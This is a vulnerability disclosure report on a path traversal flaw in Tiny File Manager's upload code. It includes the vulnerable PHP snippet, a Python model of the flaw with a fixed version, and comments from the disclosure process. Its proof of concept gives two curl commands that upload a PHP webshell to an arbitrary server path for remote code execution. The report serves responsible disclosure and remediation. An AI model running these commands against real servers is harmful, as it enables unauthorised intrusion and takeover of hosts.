Path Traversal in prasathmani/tinyfilemanager

Valid

Reported on

Feb 15th 2022


Description

A Path Traversal vulnerability exists in Tiny File Manager, which allows the upload of files to an arbitrary location on the server. The flaw derives from the way the file upload/creation is handled when a file with the same name already exists in the target directory.

Affected Code Snippet

// tinyfilemanager.php
// ... snippet ...
if(file_exists ($fullPath) && !$override_file_name) {
    $ext_1 = $ext ? '.'.$ext : '';
    // str_replace removes EVERY occurrence of the extension from the whole path,
    // not only the trailing one, so directory components are rewritten as well
    $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...

If we look at how str_replace is used to separate the old filename from its extension, we can see that it in fact removes every occurrence of the extension from the whole fullpath parameter, not just the trailing one. Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php and filename shell.php (the first request creates the file, so the second one enters the file_exists branch), each ...php segment collapses to .. and the uploaded file is moved to ../../../../../var/www/html/benign_<DATE>.php.
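As an added illustration (not code from this report or from tinyfilemanager), the following Python models the affected PHP branch, where str_replace behaves like str.replace, beside a version that rewrites only the basename, plus a containment check on the resolved target. UPLOAD_ROOT, the fixed timestamp and the helper names are assumptions made for the example.

```python
import posixpath
from typing import Optional

# Constructed sample values: the fullpath from the report and a fixed stamp
# standing in for PHP's date('ymdHis').
UPLOAD_ROOT = "/var/www/html/uploads"  # assumed upload directory
PAYLOAD = "...php/...php/...php/...php/...php/var/www/html/benign.php"
STAMP = "220215120000"


def vulnerable_unique_name(full_path: str, ext: str, stamp: str) -> str:
    """Mirror of the affected branch: like PHP str_replace, str.replace
    removes EVERY occurrence of the extension, including those that sit
    inside directory components, so '...php' collapses to '..'."""
    ext_1 = "." + ext if ext else ""
    return full_path.replace(ext_1, "") + "_" + stamp + ext_1


def hardened_unique_name(full_path: str, ext: str, stamp: str) -> str:
    """Rewrite only the basename; directory components are left untouched."""
    directory, filename = posixpath.split(full_path)
    ext_1 = "." + ext if ext else ""
    stem = filename[:-len(ext_1)] if ext_1 and filename.endswith(ext_1) else filename
    return posixpath.join(directory, stem + "_" + stamp + ext_1)


def contained_target(base_dir: str, relative: str) -> Optional[str]:
    """Resolve `relative` under base_dir and return the normalised absolute
    path, or None when it escapes base_dir (defence in depth for any
    derived name, whichever function produced it)."""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, relative))
    if target == base or target.startswith(base + "/"):
        return target
    return None


if __name__ == "__main__":
    bad = vulnerable_unique_name(PAYLOAD, "php", STAMP)
    good = hardened_unique_name(PAYLOAD, "php", STAMP)
    print("vulnerable:", bad, "->", contained_target(UPLOAD_ROOT, bad))
    print("hardened  :", good, "->", contained_target(UPLOAD_ROOT, good))
```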

Proof of Concept

curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'file=@shell.php' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'file=@shell.php' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>

Impact

By leveraging this vulnerability to upload a webshell, it is possible to achieve RCE on the server/container.

We are processing your report and will contact the prasathmani/tinyfilemanager team within 24 hours. a year ago
We have contacted a member of the prasathmani/tinyfilemanager team and are waiting to hear back a year ago
We have sent a follow up to the prasathmani/tinyfilemanager team. We will try again in 7 days. a year ago
We have sent a second follow up to the prasathmani/tinyfilemanager team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the prasathmani/tinyfilemanager team. This report is now considered stale. a year ago
Prasath Mani validated this vulnerability a year ago
joaogmauricio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Prasath Mani marked this as fixed in 2.4.7 with commit 154947 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Prasath Mani
a year ago

Maintainer


@joaogmauricio, thanks for reporting.

Jamie Slome
a year ago

Admin


@prasathmani - thanks for your contributions and effort here! Are you happy for us to assign and publish a CVE for this report?

Jamie Slome
a year ago

Admin


@prasathmani - can we also confirm that @joaogmauricio did fix the vulnerability so that we can appropriately represent this on the report and their user profile?

Prasath Mani
a year ago

Maintainer


@Jamie, @joaogmauricio has fixed the issue and a CVE report is not required.

Jamie Slome
a year ago

Admin


Just for clarity, @joaogmauricio has explicitly requested a CVE - are you happy to publish one, or would you prefer not to?

joaogmauricio
a year ago

Researcher


Hi @Jamie, thank you very much for your support and for bringing some clarity. Just to be even more clear, the CVE request process would not bring any extra work for @Prasath, correct?

Jamie Slome
a year ago

Admin


Correct - we will do all the work! 👍

Prasath Mani
a year ago

Maintainer


If a CVE is required, please go ahead.

Jamie Slome
a year ago

Admin


CVE assigned and published 🎊

joaogmauricio
a year ago

Researcher


🎊🎊 Thank you very much Prasath and Jamie for your full support. :)

Last question to Jamie (hopefully): how do we stand in regards to the fix attribution? Thanks.

Jamie Slome
a year ago

Admin


Also sorted 👍

joaogmauricio
a year ago

Researcher


I still see a 0 there, but that's maybe some sort of caching issue. I'll wait some more time and, if not, I'll open a ticket as per your suggestion. Thanks once again and have a great day ahead.

Jamie Slome
a year ago

Admin


It was a small bug on our side - deploying a fix for it now 🐞

joaogmauricio
a year ago

Researcher


:) Thanks!
